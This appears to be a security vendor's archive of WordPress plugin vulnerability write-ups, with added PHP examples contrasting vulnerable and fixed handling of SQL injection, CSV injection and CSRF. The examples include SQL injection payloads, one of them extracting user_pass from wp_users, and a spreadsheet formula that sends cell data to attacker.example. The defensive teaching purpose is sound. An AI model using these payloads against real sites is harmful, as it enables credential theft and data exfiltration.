16 Jan 2024

Cross-Site Request Forgery (CSRF)/SQL Injection Vulnerability in Pre* Party Resource Hints

Recently, Patchstack vaguely claimed there was an authenticated SQL injection vulnerability in the plugin Pre* Party Resource Hints. They claimed it was only exploitable by users with the Administrator role, so it wouldn’t be a vulnerability, since Administrators can already do the equivalent of that. In that situation there could still be a cross-site request forgery (CSRF)/SQL injection vulnerability if the code is improperly secured, though. While Patchstack provided no details, Anthony Thorne pointed to code improperly secured against SQL injection. The developer has now made an improper attempt to fix that issue.


[Read more]

11 Jan 2024

Authenticated SQL Injection Vulnerability in PDF Invoices & Packing Slips for WooCommerce

One of the changelog entries for the latest version of the WordPress plugin PDF Invoices & Packing Slips for WooCommerce is “Fix: potential SQL injection bug in Number Tools”. In looking into that, we found that this wasn’t a potential issue, but a vulnerability. Specifically, it is an authenticated SQL injection vulnerability exploitable by users with the Shop Manager role. It is also a cross-site request forgery (CSRF)/SQL injection vulnerability that could be exploited against Shop Managers and Administrators. We also found it hadn’t been fully fixed.

Looking at the changes made in the new version, we saw that in the file /includes/tables/class-wcpdf-number-store-list-table.php changes were being made related to user input being passed into a SQL statement. That code is accessed when accessing this admin page from the plugin: /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=debug&section=numbers . While the developer was already using a prepared SQL statement, they are, for some reason, passing user input directly into the statement text instead of supplying it as a placeholder argument, which defeats the purpose of the protection offered by a prepared SQL statement. The new version still doesn’t resolve that, as that aspect wasn’t addressed. Instead, the developer passed the user input through sanitize_text_field(), which strips tags and stray whitespace but leaves the quote characters needed for SQL injection intact, so it doesn’t stop SQL injection. That involves the variable $search: [Read more]

5 Apr 2023

Our Firewall Plugin Caught That SQL Injection Vulnerability Tenable Discovered Hasn’t Actually Been Fixed

Last month, security provider Tenable claimed that an authenticated SQL injection vulnerability had existed in the WordPress plugin ReviewX and was fixed in version 1.6.4. It turns out the vulnerability hasn’t been fixed.

The CVE system allowed Tenable to create a CVE ID for this, CVE-2023-26325, and didn’t check to make sure the claims were accurate [Read more]

11 Feb 2022

Our Plugin Security Checker Warned of Misuse of esc_sql() in WordPress Plugin That Leads to SQL Injection Vulnerability

One of the things we offer to help people keep their WordPress websites protected from vulnerabilities in WordPress plugins is our Plugin Security Checker, which flags the possibility of some instances of security issues in plugins.

To continue to improve the results being produced by that, we occasionally check issues being flagged by that when people run plugins from the WordPress plugin directory through that. Recently the plugin Code Manager was run through that. One of the issues identified was the possible misuse of the esc_sql() function: [Read more]
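The two patterns described above (user input interpolated into a $wpdb->prepare() format string, and esc_sql() applied to a value that never sits inside quotes) can be shown side by side with their corrected forms. The following is an added example written for this page; it is not code from PDF Invoices & Packing Slips for WooCommerce or Code Manager. FakeWpdb and fake_sanitize_text_field() are constructed stand-ins for the WordPress functions so the script runs from the command line, and the table and column names are assumed.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the parts of WordPress's $wpdb used below. It is not
// the real class: it only mimics how prepare() quotes %s, casts %d and escapes
// arguments, which is enough to show the resulting SQL text.
final class FakeWpdb
{
    public function esc_like(string $text): string
    {
        return addcslashes($text, '_%\\');
    }

    public function esc_sql(string $text): string
    {
        // Like the real function, this only escapes quote and backslash characters.
        return addslashes($text);
    }

    public function prepare(string $query, mixed ...$args): string
    {
        $i = 0;
        return preg_replace_callback('/%[sd]/', function (array $m) use (&$i, $args): string {
            $arg = $args[$i++] ?? '';
            return $m[0] === '%d' ? (string) (int) $arg : "'" . addslashes((string) $arg) . "'";
        }, $query);
    }
}

// Rough stand-in for sanitize_text_field(): strips tags and surrounding
// whitespace but, like the real function, leaves quote characters alone.
function fake_sanitize_text_field(string $s): string
{
    return trim(strip_tags($s));
}

// Pattern the PDF Invoices post describes: the search term is sanitised and then
// interpolated into the format string, so prepare() never treats it as a value.
// Table and column names are assumed for the example.
function search_vulnerable(FakeWpdb $wpdb, string $search): string
{
    $search = fake_sanitize_text_field($search);
    return $wpdb->prepare("SELECT * FROM wp_example_numbers WHERE calculated_number LIKE '%{$search}%'");
}

// Corrected form: the term is passed as the argument for a %s placeholder, with
// LIKE wildcards escaped so user input cannot widen the match.
function search_fixed(FakeWpdb $wpdb, string $search): string
{
    $like = '%' . $wpdb->esc_like($search) . '%';
    return $wpdb->prepare('SELECT * FROM wp_example_numbers WHERE calculated_number LIKE %s', $like);
}

// esc_sql() misuse: the value lands outside quotes (ORDER BY), so escaping
// quotes changes nothing. Only an allow-list of column names is safe here.
function orderby_vulnerable(FakeWpdb $wpdb, string $orderby): string
{
    return 'SELECT * FROM wp_example_numbers ORDER BY ' . $wpdb->esc_sql($orderby);
}

function orderby_fixed(string $orderby): string
{
    $allowed = ['id', 'calculated_number', 'date'];
    $column  = in_array($orderby, $allowed, true) ? $orderby : 'id';
    return 'SELECT * FROM wp_example_numbers ORDER BY ' . $column;
}

$wpdb = new FakeWpdb();

// Constructed payloads: the first breaks out of the quoted LIKE pattern, the
// second needs no quote characters at all, so esc_sql() has nothing to escape.
$quoted   = "' OR 1=1 -- ";
$unquoted = 'id, (SELECT user_pass FROM wp_users LIMIT 1)';

echo search_vulnerable($wpdb, $quoted), PHP_EOL;
echo search_fixed($wpdb, $quoted), PHP_EOL;
echo orderby_vulnerable($wpdb, $unquoted), PHP_EOL;
echo orderby_fixed($unquoted), PHP_EOL;
```

Running it prints the four statements: in the first, the quote from the payload closes the LIKE pattern and the rest of the input becomes SQL; in the second, prepare() has escaped it into a harmless string; in the third, esc_sql() returns the payload unchanged because it contains nothing to escape; in the fourth, the unknown value falls back to the default column.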

16 Jul 2021

Vulnerability Details: Cross-Site Request Forgery(CSRF)/SQL Injection in WP Simple Booking Calendar

Fixing a security vulnerability doesn’t do much good if those already using the software are not provided with the new version. That is an area where our service can help, as can be seen with the plugin WP Simple Booking Calendar, which fixed a minor security vulnerability, but where the version number hasn’t been bumped.


[Read more]

24 May 2021

Vulnerability Details: CSRF/SQL Injection Vulnerability in Side Menu

The plugin Side Menu was closed on the WordPress Plugin Directory on Wednesday. On Friday a new version was submitted with the changelog entry “Fixed: Security parameters”. Running the previous version of the plugin through our Plugin Security Checker flagged several possible instances of SQL injection in the code, which we found could be exploited through cross-site request forgery (CSRF) and had been fixed in the new version. In looking into that, we found another vulnerability that still exists in the plugin.


[Read more]

28 Feb 2020

Recently Closed WordPress Plugin with 60,000+ Installs Contains Multiple Vulnerabilities

The plugin Contact Form Submissions was closed on the WordPress Plugin Directory yesterday. That is one of the 1,000 most popular plugins with 60,000+ installs, so we were alerted to its closure. While we were looking into the plugin to see if there were any serious vulnerabilities we should be warning users of the plugin that also use our service about, we found that it contains a CSV injection vulnerability and an authenticated SQL injection vulnerability, which can also be exploited through cross-site request forgery (CSRF).

The CSV injection vulnerability involves a lack of escaping when using the plugin’s “Export to CSV” feature, as can be confirmed with the proof of concept below. [Read more]
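What the missing escaping looks like, and the neutralisation an export feature should apply, as an added example written for this page rather than code from Contact Form Submissions. The submission data is constructed, and the column names are assumed.

```php
<?php
declare(strict_types=1);

// Characters that spreadsheet applications treat as the start of a formula when
// they appear first in a cell, plus tab and carriage return, which some
// importers also honour. A leading single quote makes the cell plain text.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

// Returns the cell text with a formula trigger neutralised. Numeric values such
// as "-5" are left alone so they still import as numbers.
function csv_neutralize_cell(string $value): string
{
    if ($value !== '' && !is_numeric($value) && in_array($value[0], FORMULA_TRIGGERS, true)) {
        return "'" . $value;
    }
    return $value;
}

// RFC 4180 quoting: wrap in double quotes and double any embedded double quote.
function csv_quote(string $value): string
{
    return '"' . str_replace('"', '""', $value) . '"';
}

// Builds one CSV line; $neutralize selects the escaped or the unescaped export.
function csv_row(array $cells, bool $neutralize): string
{
    $out = [];
    foreach ($cells as $cell) {
        $cell  = (string) $cell;
        $out[] = csv_quote($neutralize ? csv_neutralize_cell($cell) : $cell);
    }
    return implode(',', $out);
}

// Constructed form submission standing in for stored contact-form data. The
// message field is what an attacker would submit through the public form: a
// formula that sends the contents of another cell to a server they control.
$submission = [
    'name'    => 'Alice',
    'email'   => 'alice@example.test',
    'message' => '=HYPERLINK("https://attacker.example/?"&A1,"click")',
];

echo csv_row(array_keys($submission), false), PHP_EOL;
echo csv_row($submission, false), PHP_EOL; // unescaped export: the cell is a live formula
echo csv_row($submission, true), PHP_EOL;  // neutralised export: the cell is text
```

Quoting the field is not enough on its own: spreadsheet applications evaluate a cell that begins with `=` whether or not the CSV field was wrapped in double quotes, so the leading quote character is the part that actually disarms it.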

30 Aug 2019

Vulnerability Details: Cross-Site Request Forgery (CSRF)/SQL Injection in WooCommerce Live Checkout Field Capture

One of the changelog entries for the latest version of the plugin WooCommerce Live Checkout Field Capture is “Improved database query security”. Looking at the changes made, we found that referred to a SQL injection vulnerability exploitable through cross-site request forgery (CSRF), where the SQL injection portion was fixed, but not the CSRF portion.
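The half-fixed state described here, and in the Side Menu post above, is a handler whose query is now safe but which any page on the web can still trigger in a logged-in user's browser. The following added example (written for this page, not the plugin's own code) contrasts that with a handler that checks capability and nonce before touching the database. fake_create_nonce(), fake_verify_nonce() and fake_current_user_can() are constructed stand-ins for the WordPress functions so the script runs outside WordPress; the action name, capability and row data are assumed.

```php
<?php
declare(strict_types=1);

// Stand-ins for WordPress's nonce and capability helpers. Real nonces are HMACs
// over the action, the current user and a time tick; this stub keeps the first
// two and a constructed secret so the example runs on its own.
const NONCE_SECRET = 'constructed-secret-not-a-real-salt';

function fake_create_nonce(string $action, int $userId): string
{
    return substr(hash_hmac('sha256', $action . '|' . $userId, NONCE_SECRET), 0, 10);
}

function fake_verify_nonce(?string $nonce, string $action, int $userId): bool
{
    return is_string($nonce) && hash_equals(fake_create_nonce($action, $userId), $nonce);
}

function fake_current_user_can(array $user, string $cap): bool
{
    return in_array($cap, $user['caps'], true);
}

// Handler in the partially fixed state: the id is cast, so the SQL injection is
// gone, but nothing ties the request to a form the user actually submitted. A
// hidden form or image tag on another site can still fire it while an
// administrator is logged in. $rows stands in for the database table.
function delete_capture_vulnerable(array $request, array &$rows): bool
{
    $id = (int) ($request['id'] ?? 0); // replaces the unescaped interpolation
    unset($rows[$id]);                 // stands in for $wpdb->query(prepare(...))
    return true;
}

// Corrected handler: capability check, then nonce check (check_admin_referer()
// in WordPress), and only then the database write. Action name and capability
// are assumed for the example.
function delete_capture_fixed(array $user, array $request, array &$rows): bool
{
    if (!fake_current_user_can($user, 'manage_woocommerce')) {
        return false;
    }
    if (!fake_verify_nonce($request['_wpnonce'] ?? null, 'delete_capture', $user['id'])) {
        return false;
    }
    $id = (int) ($request['id'] ?? 0);
    unset($rows[$id]);
    return true;
}

$admin = ['id' => 1, 'caps' => ['manage_woocommerce']];
$table = [7 => 'captured checkout fields'];

// Cross-site request: the attacker chooses the parameters but cannot know the
// nonce, because it is minted per user with a secret they do not have.
$forged = ['id' => 7];

$rowsA = $table;
delete_capture_vulnerable($forged, $rowsA);
printf("partially fixed handler, forged request: %s\n", isset($rowsA[7]) ? 'row kept' : 'row deleted');

$rowsB = $table;
delete_capture_fixed($admin, $forged, $rowsB);
printf("fixed handler, forged request: %s\n", isset($rowsB[7]) ? 'row kept' : 'row deleted');

// Same request submitted from the plugin's own admin page, which embeds a nonce
// for this user (wp_nonce_field() in WordPress).
$legit = ['id' => 7, '_wpnonce' => fake_create_nonce('delete_capture', $admin['id'])];

$rowsC = $table;
delete_capture_fixed($admin, $legit, $rowsC);
printf("fixed handler, legitimate request: %s\n", isset($rowsC[7]) ? 'row kept' : 'row deleted');
```

The order of the two checks matters less than their presence: the capability check stops lower-privileged users, and the nonce check stops third-party sites from driving a privileged user's browser, which is the CSRF portion the changelog entry left unaddressed.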


[Read more]